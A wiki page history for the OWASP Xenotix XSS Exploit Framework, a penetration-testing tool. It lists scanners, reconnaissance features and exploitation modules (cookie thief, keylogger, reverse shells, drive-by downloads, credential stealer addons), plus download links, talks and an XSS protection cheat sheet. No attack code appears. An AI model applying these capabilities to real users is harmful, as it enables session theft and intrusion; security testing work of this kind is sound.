*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]
MD5: 69b96d2a66f7dffeaa8a7c7926278042
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar
MD5: bdfce2d4af4012ecc20b86bed876a54a

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-09-14T15:21:56Z

Ajin Abraham: V6 Release Changes

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]
MD5: 69b96d2a66f7dffeaa8a7c7926278042
* Download V5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar
MD5: bdfce2d4af4012ecc20b86bed876a54a

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

File:Xen6.png

2014-09-14T15:17:24Z

Ajin Abraham:

File:Dwd.png

2014-09-14T15:01:38Z

Ajin Abraham:

OWASP Xenotix XSS Exploit Framework

2014-06-30T04:43:06Z

Ajin Abraham: added xss protection cheat sheet for developers

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 5==

[[Image:XenotixV5.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]

== NEWS AND EVENTS ==
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*DOM Scanner
*Multiple Parameter Scanner
*POST Request Scanner
*Request Repeater
*URL Fuzzer
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
*Browser Fingerprinting
*Browser Features Detector
*Get Network IP
*Ping Scan
*Port Scan
*Internal Network Scan

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Phisher
*Tabnabbing
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*Gram WebCam Screenshot
*Executable Drive By
*JavaScript Shell
*Reverse HTTP WebShell
*Drive-By Reverse Shell
*Metasploit Browser Exploit
*Firefox Reverse Shell Addon (Persistent)
*Firefox Session Stealer Addon (Persistent)
*Firefox Keylogger Addon (Persistent)
*Firefox DDoSer Addon (Persistent)
*Firefox Linux Credential File Stealer Addon (Persistent)
*Firefox Download and Execute Addon (Persistent)

'''UTILITY MODULES'''
*WebKit Developer Tools
*Payload Encoder
*JavaScript Beautify
*Hash Calculator
*Hash Detector

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]
MD5: bdfce2d4af4012ecc20b86bed876a54a
====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690
====Older Versions====
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Version 5 Videos'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

=Project About=
<div style="font-size:120%;border:none;margin: 0;color:#000">

{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}
__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

File:Xss protection.png

2014-06-30T04:33:43Z

Ajin Abraham: The Ultimate XSS Protection Cheat Sheet for Developers

The Ultimate XSS Protection Cheat Sheet for Developers

Projects/OWASP Xenotix XSS Exploit Framework

2014-06-17T18:24:52Z

Ajin Abraham:

{{Template:Project About
| project_name =OWASP Xenotix XSS Exploit Framework

| project_description =OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.
| project_license =Creative Commons Attribution ShareAlike 3.0 License
| leader_name1 =Ajin Abraham
| leader_email1 =ajin25@gmail.com
| mailing_list_name = https://lists.owasp.org/mailman/listinfo/owasp_xenotix_xss_exploit_framework
